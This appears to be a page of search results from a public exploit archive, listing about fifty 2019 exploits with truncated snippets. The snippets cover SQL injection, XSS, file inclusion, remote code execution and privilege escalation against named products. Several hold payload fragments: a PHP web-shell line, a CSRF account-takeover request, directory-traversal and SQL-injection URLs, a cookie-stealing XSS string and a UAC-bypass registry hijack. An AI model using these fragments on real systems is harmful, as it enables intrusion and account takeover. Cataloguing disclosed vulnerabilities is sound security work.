41207 matches found
Karenderia Multiple Restaurant System 5.3 - Local File Inclusion
Karenderia Multiple Restaurant System 5.3 - Local File Inclusion =========================================================================================== Exploit Title: Karenderia CMS 5.1 - LFI Vuln. Dork: N/A Date: 04-07-2019 Exploit Author: Mehmet EMIROGLU Software Link:...
Symantec DLP 15.5 MP1 - Cross-Site Scripting
Symantec DLP 15.5 MP1 - Cross-Site Scripting Exploit Title: Persistent XSS on Symantec DLP = 15.5 MP1 Date: 2019-06-21 Exploit Author: Chapman Schleiss Vendor Homepage: https://www.symantec.com/ Software Link: https://support.symantec.com/us/en/mysymantec.html Version: = 15.5 MP1 CVE : 2019-9701...
Centreon 19.04 - Remote Code Execution
Centreon 19.04 - Remote Code Execution !/usr/bin/python ''' Exploit Title: Centreon v19.04 authenticated Remote Code Execution Date: 28/06/2019 Exploit Author: Askar @mohammadaskar2 CVE : CVE-2019-13024 Vendor Homepage: https://www.centreon.com/ Software link: https://download.centreon.com Versio...
ZoneMinder 1.32.3 - Cross-Site Scripting
ZoneMinder 1.32.3 - Cross-Site Scripting Exploit Title: ZoneMinder 1.32.3 - Stored Cross Site Scripting filters Google Dork: None Date: 6/29/2019 Exploit Author: Joey Lane Vendor Homepage: https://zoneminder.com Software Link: https://github.com/ZoneMinder/zoneminder/releases Version: 1.32.3 Test...
PowerPanel Business Edition - Cross-Site Scripting
PowerPanel Business Edition - Cross-Site Scripting Exploit Title: PowerPanel Business Edition - Stored Cross Site Scripting SNMP trap receivers Google Dork: None Date: 6/29/2019 Exploit Author: Joey Lane Vendor Homepage: https://www.cyberpowersystems.com Version: 3.4.0 Tested on: Ubuntu 16.04 CVE...
WorkSuite PRM 2.4 - password SQL Injection
WorkSuite PRM 2.4 - password SQL Injection =========================================================================================== Exploit Title: WorkSuite PRM 2.4 - 'password' SQL Inj. Dork: N/A Date: 01-05-2019 Exploit Author: Mehmet EMİROĞLU Vendor Homepage:...
FaceSentry Access Control System 6.4.8 - Cross-Site Request Forgery
FaceSentry Access Control System 6.4.8 - Cross-Site Request Forgery FaceSentry Access Control System 6.4.8 Cross-Site Request Forgery Vendor: iWT Ltd. Product web page: http://www.iwt.com.hk Affected version: Firmware 6.4.8 build 264 Algorithm A16 Firmware 5.7.2 build 568 Algorithm A14 Firmware...
CiuisCRM 1.6 - eventType SQL Injection
CiuisCRM 1.6 - eventType SQL Injection =========================================================================================== Exploit Title: CiuisCRM 1.6 - 'eventType' SQL Inj. Dork: N/A Date: 27-05-2019 Exploit Author: Mehmet EMİROĞLU Vendor Homepage:...
SAP Crystal Reports - Information Disclosure
SAP Crystal Reports - Information Disclosure Exploit Title: Sensitive Information Disclosure in SAP Crystal Reports Date: 2019-04-10 Exploit Author: Mohamed M.Fouad - From SecureMisr Company Vendor Homepage: https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=517899114 Version: SAP Crystal...
Varient 1.6.1 - SQL Injection
Varient 1.6.1 - SQL Injection =========================================================================================== Exploit Title: Varient 1.6.1 SQL Inj. Dork: N/A Date: 29-06-2019 Exploit Author: Mehmet EMIROGLU Vendor Homepage: https://varient.codingest.com/ Software Link:...
Linux Mint 18.3-19.1 - yelp Command Injection (Metasploit)
Linux Mint 18.3-19.1 - yelp Command Injection Metasploit This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework Exploit from github repro: https://github.com/b1ack0wl/linuxmintpoc class MetasploitModule "Linux Mint 'yelp' UR...
FaceSentry Access Control System 6.4.8 - Remote Command Injection
FaceSentry Access Control System 6.4.8 - Remote Command Injection FaceSentry Access Control System 6.4.8 Remote Command Injection Vendor: iWT Ltd. Product web page: http://www.iwt.com.hk Affected version: Firmware 6.4.8 build 264 Algorithm A16 Firmware 5.7.2 build 568 Algorithm A14 Firmware 5.7.0...
Sahi pro 8.x - Directory Traversal
Sahi pro 8.x - Directory Traversal Exploit Title: Sahi pro 8.x Directory traversal Date: 2019-06-25 Exploit Author: Operat0r Vendor Homepage: https://sahipro.com/ Software Link: https://sahipro.com/downloads-archive/ Version: 8.0 Tested on: Linux Ubuntu / Windows 7 CVE: CVE-2019-13063 An issue wa...
FaceSentry Access Control System 6.4.8 - Remote SSH Root
FaceSentry Access Control System 6.4.8 - Remote SSH Root !/usr/bin/env python -- coding: utf-8 -- FaceSentry Access Control System 6.4.8 Remote SSH Root Access Exploit Vendor: iWT Ltd. Product web page: http://www.iwt.com.hk Affected version: Firmware 6.4.8 build 264 Algorithm A16 Firmware 5.7.2...
FaceSentry Access Control System 6.4.8 - Remote Root Exploit
FaceSentry Access Control System 6.4.8 - Remote Root Exploit !/usr/bin/env python -- coding: utf-8 -- FaceSentry Access Control System 6.4.8 Remote Root Exploit Vendor: iWT Ltd. Product web page: http://www.iwt.com.hk Affected version: Firmware 6.4.8 build 264 Algorithm A16 Firmware 5.7.2 build 5...
CyberPanel 1.8.4 - Cross-Site Request Forgery
CyberPanel 1.8.4 - Cross-Site Request Forgery Title: CyberPanel Administrator Account Takeover fetch'https://SERVERIP:8090/users/saveModifications', method: 'POST', credentials: 'include', headers: 'Content-Type': 'text/plain', body:...
LibreNMS 1.46 - addhost Remote Code Execution
LibreNMS 1.46 - addhost Remote Code Execution !/usr/bin/python ''' Exploit Title: LibreNMS v1.46 authenticated Remote Code Execution Date: 24/12/2018 Exploit Author: Askar @mohammadaskar2 CVE : CVE-2018-20434 Vendor Homepage: https://www.librenms.org/ Version: v1.46 Tested on: Ubuntu 18.04 / PHP...
Mozilla Spidermonkey - IonMonkey Array.prototype.pop Type Confusion
Mozilla Spidermonkey - IonMonkey Array.prototype.pop Type Confusion The following program found through fuzzing and manually modified crashes Spidermonkey built from the current beta channel and Firefox 66.0.3 current stable: // Run with --no-threads for increased reliability const v4 = a: 0, a: ...
WordPress Plugin Live Chat Unlimited 2.8.3 - Cross-Site Scripting
WordPress Plugin Live Chat Unlimited 2.8.3 - Cross-Site Scripting Exploit Title: Live Chat Unlimited v2.8.3 Stored XSS Injection Google Dork: inurl:"wp-content/plugins/screets-lcx" Date: 2019/06/25 Exploit Author: m0ze Vendor Homepage: https://screets.com/ Software Link:...
BlogEngine.NET 3.3.63.3.7 - path Directory Traversal
BlogEngine.NET 3.3.63.3.7 - path Directory Traversal Exploit Title: Directory Traversal on BlogEngine.NET Date: 24 Jun 2019 Exploit Author: Aaron Bishop Vendor Homepage: https://blogengine.io/ Version: v3.3.7 Tested on: 3.3.7, 3.3.6 CVE : 2019-10717 1. Description ============== BlogEngine.NET is...
SAPIDO RB-1732 - Remote Command Execution
SAPIDO RB-1732 - Remote Command Execution Exploit Title: SAPIDO RB-1732 command line execution Date: 2019-6-24 Exploit Author: k1nm3n.aotoi Vendor Homepage: http://www.sapido.com.tw/ Software Link: http://www.sapido.com.tw/CH/data/Download/firmware/rb1732/tc/RB-1732TCv2.0.43.bin Version: RB-1732...
Fortinet FCM-MB40 - Cross-Site Request Forgery Remote Command Execution
Fortinet FCM-MB40 - Cross-Site Request Forgery Remote Command Execution Exploit Title: FCM-MB40 Remote Command Execution as Root via CSRF Date: 2019-06-19 Exploit Author: @XORcat Vendor Homepage: https://fortinet.com/ Software Link: Customer Account Required Version: v1.2.0.0 Tested on: Linux CVE...
AZADMIN CMS 1.0 - SQL Injection
AZADMIN CMS 1.0 - SQL Injection + Sql Injection on AZADMIN CMS of HIDEA v1.0 + Date: 24/06/2019 + CWE Number : CWE-89 + Risk: High + Author: Felipe Andrian Peixoto + Vendor Homepage: https://www.hidea.com/ + Contact: [email protected] + Tested on: Windows 7 and Linux + Vulnerable Files:...
SuperDoctor5 - NRPE Remote Code Execution
SuperDoctor5 - NRPE Remote Code Execution SuperMicro implemented a Remote Command Execution plugin in their implementation of NRPE in SuperDocter 5, which is their monitoring utility for SuperMicro chassis'. This is an intended feature but leaves the system open by default to unauthenticated remo...
WordPress Plugin iLive 1.0.4 - Cross-Site Scripting
WordPress Plugin iLive 1.0.4 - Cross-Site Scripting Exploit Title: iLive - Intelligent WordPress Live Chat Support Plugin v1.0.4 Stored XSS Injection Google Dork: - Date: 2019/06/25 Exploit Author: m0ze Vendor Homepage: http://www.ilive.wpapplab.com/ Software Link:...
GSearch 1.0.1.0 - Denial of Service (PoC)
GSearch 1.0.1.0 - Denial of Service PoC Exploit Title: GSearch v1.0.1.0 - Denial of Service PoC Date: 6/23/2019 Author: 0xB9 Twitter: @0xB9Sec Contact: 0xB9atpm.me Software Link: https://www.microsoft.com/store/productId/9NDTMZKLC693 Version: 1.0.1.0 Tested on: Windows 10 Proof of Concept: Run th...
Microsoft Windows Font Cache Service - Insecure Sections Privilege Escalation
Microsoft Windows Font Cache Service - Insecure Sections Privilege Escalation Windows: Windows Font Cache Service Insecure Sections EoP Platform: Windows 10 1809 not tested earlier Class: Elevation of Privilege Security Boundary per Windows Security Service Criteria: User boundary Summary: The...
SeedDMS 5.1.11 - out.UsrMgr.php Cross-Site Scripting
SeedDMS 5.1.11 - out.UsrMgr.php Cross-Site Scripting Exploit Title: Persistent Cross-Site Scripting or Stored XSS in out/out.UsrMgr.php in SeedDMS before 5.1.11 Google Dork: NA Date: 20-June-2019 Exploit Author: Nimit Jainhttps://secfolks.blogspot.com Vendor Homepage: https://www.seeddms.org...
dotProject 2.1.9 - SQL Injection
dotProject 2.1.9 - SQL Injection Exploit Title: dotProject 2.1.9 - Multiple Sql Injection Poc Exploit Author: Metin Yunus Kandemir kandemir Vendor Homepage: https://dotproject.net Software Link: https://github.com/dotproject/dotProject/archive/v2.1.9.zip Version: 2.1.9 Category: Webapps Tested on...
SeedDMS versions 5.1.11 - Remote Command Execution
SeedDMS versions 5.1.11 - Remote Command Execution Exploit Title: Remote Command Execution through Unvalidated File Upload in SeedDMS versions "; $cmd = $REQUEST'cmd'; system$cmd; echo ""; die; ? Step 3: Now after uploading the file check the document id corresponding to the document. Step 4: Now...
Microsoft Windows - CmpAddRemoveContainerToCLFSLog Arbitrary FileDirectory Creation
Microsoft Windows - CmpAddRemoveContainerToCLFSLog Arbitrary FileDirectory Creation Windows: CmpAddRemoveContainerToCLFSLog Arbitrary File/Directory Creation EoP Platform: Windows 10 1809 not tested earlier Class: Elevation of Privilege Security Boundary per Windows Security Service Criteria: Use...
GrandNode 4.40 - Path Traversal Arbitrary File Download
GrandNode 4.40 - Path Traversal Arbitrary File Download Exploit Title: GrandNode Path Traversal & Arbitrary File Download Unauthenticated Date: 06/23/3019 Exploit Author: Corey Robinson https://twitter.com/CRobSec Vendor Homepage: https://grandnode.com/ Software Link:...
SeedDMS 5.1.11 - out.GroupMgr.php Cross-Site Scripting
SeedDMS 5.1.11 - out.GroupMgr.php Cross-Site Scripting Exploit Title: Persistent Cross-Site Scripting or Stored XSS in out/out.GroupMgr.php in SeedDMS before 5.1.11 Google Dork: NA Date: 17-June-2019 Exploit Author: Nimit Jainhttps://secfolks.blogspot.com Vendor Homepage: https://www.seeddms.org...
EA Origin 10.5.38 - Remote Code Execution
EA Origin 10.5.38 - Remote Code Execution Exploit Title: EA Origin 10.5.38 Remote Code Execution Date: 05/22/2019 Exploit Author: Dominik Penner @zer0pwn Vendor Homepage: https://www.origin.com Software Link: https://www.origin.com/can/en-us/store/download Version: 10.5.38 and below Tested on:...
Linux - Use-After-Free via race Between modify_ldt() and #BR Exception
Linux - Use-After-Free via race Between modifyldt and BR Exception / When a BR exception is raised because of an MPX bounds violation, Linux parses the faulting instruction and computes the linear address of its memory operand. If the userspace instruction is in 32-bit code, this involves looking...
WebERP 4.15 - SQL injection
WebERP 4.15 - SQL injection Exploit Title: Blind SQL injection in WebERP. Date: June 10, 2019 Exploit Author: Semen Alexandrovich Lyhin https://www.linkedin.com/in/semenlyhin/ Vendor Homepage: http://www.weberp.org/ Version: 4.15 A malicious query can be sent in base64 encoding to unserialize...
BlogEngine.NET 3.3.63.3.7 - XML External Entity Injection
BlogEngine.NET 3.3.63.3.7 - XML External Entity Injection Exploit Title: Out-of-band XML External Entity Injection on BlogEngine.NET Date: 19 June 2019 Exploit Author: Aaron Bishop Vendor Homepage: https://blogengine.io/ Version: v3.3.7 Tested on: 3.3.7, 3.3.6 CVE : 2019-10718 1. Description...
Tuneclone 2.20 - Local SEH Buffer Overflow
Tuneclone 2.20 - Local SEH Buffer Overflow Exploit Title: TuneClone Local Seh Exploit Date: 19.06.2019 Vendor Homepage: http://www.tuneclone.com/ Software Link: http://www.tuneclone.com/tuneclonesetup.exe Exploit Author: Achilles Tested Version: 2.20 Tested on: Windows XP SP3 EN 1.- Run python co...
BlogEngine.NET 3.3.63.3.7 - dirPath Directory Traversal Remote Code Execution
BlogEngine.NET 3.3.63.3.7 - dirPath Directory Traversal Remote Code Execution Exploit Title: Directory Traversal + RCE on BlogEngine.NET Date: 17 Jun 2019 Exploit Author: Aaron Bishop Vendor Homepage: https://blogengine.io/ Version: v3.3.7 Tested on: 3.3.7, 3.3.6 CVE : 2019-10719 1. Description...
BlogEngine.NET 3.3.63.3.7 - theme Cookie Directory Traversal Remote Code Execution
BlogEngine.NET 3.3.63.3.7 - theme Cookie Directory Traversal Remote Code Execution Exploit Title: Directory Traversal + RCE on BlogEngine.NET Date: 17 Jun 2019 Exploit Author: Aaron Bishop Vendor Homepage: https://blogengine.io/ Version: v3.3.7 Tested on: 3.3.7, 3.3.6 CVE : 2019-10720 1...
Sahi pro 7.x8.x - Directory Traversal
Sahi pro 7.x8.x - Directory Traversal Exploit Title: Sahi pro :/s/dyn/Loghighlight?href=../../../../windows/win.ini&n=1selected...
Serv-U FTP Server 15.1.7 - Local Privilege Escalation (1)
Serv-U FTP Server 15.1.7 - Local Privilege Escalation 1 / CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation vulnerability found by: Guy Levin @vastart - twitter.com/vastart https://blog.vastart.dev to compile and run: gcc servu-pe-cve-2019-12181.c -o pe && ./pe / include include include int main...
Sahi pro 8.x - Cross-Site Scripting
Sahi pro 8.x - Cross-Site Scripting Exploit Title: Sahi pro alertdocument.cookie”.start; log“testing stored XSS injection”; $tc1.end; Step 2 : Execute the created script poc.sah using sahi GUI controller . Step 3 : navigate to the web logs console http://:/logs using the browser for the executed...
Sahi pro 8.x - SQL Injection
Sahi pro 8.x - SQL Injection Exploit Title: Sahi pro :/s/dyn/pro/DBReports?sql=SELECT DISTINCT memoryused AS ROWSTATUS, SCRIPTREPORTS.SCRIPTREPORTID,SCRIPTREPORTS.SCRIPTNAME,SUITEREPORTS. FROM SUITEREPORTS,SCRIPTREPORTS...
CleverDog Smart Camera DOG-2W DOG-2W-V4 - Multiple Vulnerabilities
CleverDog Smart Camera DOG-2W DOG-2W-V4 - Multiple Vulnerabilities 1. Advisory Information ======================================== Title: Clever Dog Smart Camera Vendor Homepage: http://www.cleverdog.com.cn/ Tested on Camera types : DOG-2W, DOG-2W-V4 Vulnerability: Hardware- Multiple...
Thunderbird ESR 60.7.XXX - parser_get_next_char Heap-Based Buffer Overflow
Thunderbird ESR 60.7.XXX - parsergetnextchar Heap-Based Buffer Overflow X41 D-Sec GmbH Security Advisory: X41-2019-002 Heap-based buffer overflow in Thunderbird ========================================= Severity Rating: High Confirmed Affected Versions: All versions affected Confirmed Patched...
Thunderbird ESR 60.7.XXX - Type Confusion
Thunderbird ESR 60.7.XXX - Type Confusion -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 X41 D-Sec GmbH Security Advisory: X41-2019-004 Type confusion in Thunderbird ============================= Severity Rating: Medium Confirmed Affected Versions: All versions affected Confirmed Patched Version...
HC10 HC.Server Service 10.14 - Remote Invalid Pointer Write
HC10 HC.Server Service 10.14 - Remote Invalid Pointer Write + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/HC10-HC.SERVER-10.14-REMOTE-INVALID-POINTER-WRITE.txt + ISR: ApparitionSec Vendor www.hostingcontroller.com Produ...
Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (PowerShell)
Microsoft Windows - UAC Protection Bypass Via Slui File Handler Hijack PowerShell Interactive Version: function SluiHijackBypass Param ParameterMandatory=$True String$command, ValidateSet64,86 int$arch = 64 Create registry structure New-Item "HKCU:\Software\Classes\exefile\shell\open\command"...
RedwoodHQ 2.5.5 - Authentication Bypass
RedwoodHQ 2.5.5 - Authentication Bypass -- encoding: utf-8 -- !/usr/bin/python3 Exploit Title: RedxploitHQ Create Admin User by missing authentication on db Date: 14-june-2019 Exploit Author: EthicalHCOP Version: 2.0 / 2.5.5 Vendor Homepage: https://redwoodhq.com/ Software Link:...